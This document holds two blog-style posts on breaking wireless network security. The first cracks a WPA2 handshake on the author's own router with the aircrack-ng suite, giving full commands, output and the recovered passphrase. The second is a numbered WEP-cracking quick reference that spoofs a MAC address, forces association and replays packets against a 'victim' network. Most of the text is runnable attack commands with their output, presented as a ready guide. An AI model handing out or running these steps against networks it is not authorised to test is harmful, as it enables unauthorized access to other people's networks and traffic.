Hacking WPA2 Wireless Networks…
Hey,
I decided to document how to break into a WPA2 enabled wireless network, so I setup my LinkSys WRT54G wireless router over the weekend, here is how I broke into it:
root@bt:~# airmon-ng stop wlan0
Interface Chipset Driver
wlan0 ZyDAS 1211 zd1211rw - [phy1]
(monitor mode disabled)
Start the wireless card in monitor mode:
root@bt:~# airmon-ng start wlan0
Interface Chipset Driver
wlan0 ZyDAS 1211 zd1211rw - [phy1]
(monitor mode enabled on mon0)
Now we want to run airodump-ng and filter out all the other access points and clients so that we only capture the handshake for our target access point (HackMe):
root@bt:~# airodump-ng --bssid 00:0C:41:9D:C7:5C --channel 6 --write HackMe-Demo mon0
CH 6 ][ Elapsed: 32 s ][ 2010-06-20 19:44 ][ WPA handshake: 00:0C:41:9D:C7:5C
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:0C:41:9D:C7:5C 0 100 316 38 0 6 54 WPA2 CCMP PSK HackMe]
BSSID STATION PWR Rate Lost Packets Probes
00:0C:41:9D:C7:5C 00:21:5C:90:2D:89 0 1 - 1 126 456 HackMe
root@bt:~#
Whilst we leave airodump-ng capturing packets and waiting for the WPA Handshake, we can speed things up a little using aireplay-ng. We can force one of the associated clients to de-auth and it will automatically re-authenticate itself with the access point allowing us to capture the WPA Handshake:
root@bt:~# aireplay-ng -0 1 -a 00:0C:41:9D:C7:5C -c 00:21:5C:90:2D:89 mon0
19:44:42 Waiting for beacon frame (BSSID: 00:0C:41:9D:C7:5C) on channel 6
19:44:43 Sending 64 directed DeAuth. STMAC: [00:21:5C:90:2D:89] [126|184 ACKs]
root@bt:~# aireplay-ng -0 1 -a 00:0C:41:9D:C7:5C -c 00:21:5C:90:2D:89 mon0
19:44:48 Waiting for beacon frame (BSSID: 00:0C:41:9D:C7:5C) on channel 6
19:44:48 Sending 64 directed DeAuth. STMAC: [00:21:5C:90:2D:89] [ 0|169 ACKs]
root@bt:~# aireplay-ng -0 1 -a 00:0C:41:9D:C7:5C -c 00:21:5C:90:2D:89 mon0
19:44:50 Waiting for beacon frame (BSSID: 00:0C:41:9D:C7:5C) on channel 6
19:44:51 Sending 64 directed DeAuth. STMAC: [00:21:5C:90:2D:89] [185|179 ACKs]
root@bt:~#
Excellent, as you can see we managed to capture the WPA Handshake, let’s crack it and get the WPA passphrase we can then use to connect to the wireless network:
CH 6 ][ Elapsed: 32 s ][ 2010-06-20 19:44 ][ WPA handshake: 00:0C:41:9D:C7:5C
root@bt:~# aircrack-ng -a 2 -b 00:0C:41:9D:C7:5C -e HackMe -w password.txt HackMe-Demo-01.cap
Opening HackMe-Demo-01.cap
Reading packets, please wait...
Aircrack-ng 1.1 r1729
[00:00:00] 4 keys tested (67.32 k/s)
KEY FOUND! [ password ]
Master Key : 52 EC 07 C0 95 E6 7B 26 DD 40 59 67 10 7C F6 F7
BE EF E6 66 8D 70 A6 1C 56 BE F5 DD A2 B8 5D 32
Transient Key : 41 3E E2 11 47 CA DA EC 39 FA B8 23 79 4C 01 6A
AC B3 C0 45 FE 62 3F BF 4F 0A A9 B0 63 A1 AC 2E
D4 9C C6 09 C1 A9 82 A8 68 1B 71 BC 65 72 BE 97
C6 A8 2F A9 12 DA 08 C6 73 A5 90 DD E9 EF 5F 66
EAPOL HMAC : CA E1 1F 29 45 9A 1D 5D 1B 25 BF 51 92 1A 95 A9
root@bt:~#
Yay! We got the passphrase, which was “password” 
Hacking WEP Encrypted Wireless Network Notes
Hey, this is just a quick post to outline the steps involved in cracking WEP protected wireless networks. I will be using the aircrack-ng suite to do this. Follow these steps:
1 ) airmon-ng
Find the network adapter interface to use…
2 ) airmon-ng stop wlan0
Stop the interface.
3 ) ifconfig wlan0 down
Bring the interface down.
4 ) macchanger –mac 00:11:22:33:44:55 wlan0
Bind a fake mac address to the interface.
5 ) airmon-ng start wlan0
Bring the interface back up in monitor mode.
6 ) airodump-ng wlan0
Take a look to see what networks are available.
Choose the target, grab the essential bits of information: (Victim MAC Address, BSSID, ESSID, Channel).
7 ) airodump-ng -c CHANNEL_NUMER -w FILENAME –bssid VICTIM_MAC wlan0
Start capturing IVs.
8 ) aireplay-ng -1 0 -a VICTIM_MAC -h 00:11:22:33:44:55 -e VICTIM_ESSID wlan0
Associate with the access point.
9 ) aireplay-ng -3 -b VICTIM_MAC -h 00:11:22:33:44:55 wlan0
Replay ARP packets.
10 ) aircrack-ng -n 64 -b VICTIM_MAC *.cap
Crack the password
This is a nice quick reference for hacking WEP encrypted wireless networks.
